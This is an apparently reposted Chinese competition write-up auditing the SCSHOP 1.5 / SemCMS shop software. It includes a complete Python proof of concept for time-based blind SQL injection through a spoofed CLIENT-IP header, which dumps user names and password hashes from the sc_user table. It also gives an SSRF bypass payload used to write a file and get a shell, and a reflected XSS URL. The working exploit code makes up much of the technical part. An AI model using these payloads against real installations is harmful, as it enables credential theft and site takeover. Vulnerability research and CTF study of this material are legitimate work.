當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

比赛的一道题：SCSHOP1.5代码审计

發(fā)布時間：2025/3/21 编程问答 24 豆豆

生活随笔收集整理的這篇文章主要介紹了比赛的一道题：SCSHOP1.5代码审计小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

源碼下載

https://www.sem-cms.cn/wenda/view-52.html

看一下代碼邏輯結(jié)構(gòu)

include_once 'db_con.php'; 數(shù)據(jù)庫配置 include_once 'Ant_Check.php'; sql注入檢測 include_once 'Ant_Class.php'; 數(shù)據(jù)操作 include_once 'Ant_Contrl.php'; 一些函數(shù)封裝 include_once 'class.phpmailer.php'; 郵件操作 include_once 'Ant_Config.php'; 全局設(shè)置 include_once 'Ant_Shop.php'; 商品屬性的一些設(shè)置函數(shù)

發(fā)現(xiàn)它只是對GET就行了過濾！

看看有沒有其它方式的參數(shù)獲取！

Core/Program/Ant_Contrl.php 里

GetIp 函數(shù)返回ip! 這里我們可控！而且不受過濾！

調(diào)用的地方有：

咱就用 Search_Data這個函數(shù)！

測試：

注入成功

→_→點(diǎn)擊查看學(xué)習(xí)資料·攻略

2000多本網(wǎng)絡(luò)安全系列電子書
網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料
項(xiàng)目源碼
網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux、web安全、攻防方面的視頻
網(wǎng)絡(luò)安全學(xué)習(xí)路線圖

poc

#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2021/11/28 18:28 # @Author : upload # @File : aa.py # @Software: PyCharm import requestsproxy = '127.0.0.1:8086' proxies = {'http': 'http://' + proxy,'https': 'https://' + proxy, } url = "http://anxun.com:80/Template/Default/File/search.php" cookies = {"XDEBUG_SESSION": "PHPSTORM", "PHPSESSID": "moigehp8edd6g71hltptjjogs4", "UM_distinctid": "17d6e9309a5d7-0e967d747fce92-d7e163f-144000-17d6e9309a6a63", "CNZZDATA1279754351": "673588782-1638237672-null%7C1638237672"} headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://anxun.com", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://anxun.com/Template/Default/File/search.php", "CLIENT-IP": "'or sleep(3) or'", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} data = {"search": "1"}print(headers['CLIENT-IP']) flag='' for i in range(1,100):f1=flagtop=127low=33while low<=top:mid = (top + low) // 2print(i,mid)payload1 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))={}),sleep(3),0) or\''.format(i,mid)payload2 = '\'or if((ord(substr((select(group_concat(user_name,"~",user_ps,"~",user_name))from(sc_user)),{},1))>{}),sleep(3),0) or\''.format(i,mid)headers['CLIENT-IP'] = payload1try:r1 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)print(headers)except:flag +=chr(mid)print(flag)breakelse:try:headers['CLIENT-IP'] = payload2r2 = requests.post(url, data=data,headers=headers,timeout=2,proxies=proxies)except:low = mid + 1else:top = mid - 1if flag == f1:break print(flag)

解密后 semcms

其它地方的sql注入應(yīng)該也可以！

后臺挖掘

有一個任意文件讀取！

從遠(yuǎn)程讀取文件！

最后可以保存它

不過要繞過限制：

用

payload:

url=http://sem-cms.cn@0.0.0.0/index.php

成功寫入：

getshell

xss

反射型

http://anxun.com/r20A88_A2M/Ant_M_Delivery.php?page=adadad&aed=a&sortID="<script>alert('XSS')</script>"

最后

感謝你能夠看完這篇文章，如果有需要學(xué)習(xí)資料的話可以關(guān)注回復(fù)“資料”即可獲取

總結(jié)

以上是生活随笔為你收集整理的比赛的一道题：SCSHOP1.5代码审计的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

代码

上一篇：一款功能强大，可扩展端到端加密反向She
下一篇：如何使用lazyCSRF在Burp Su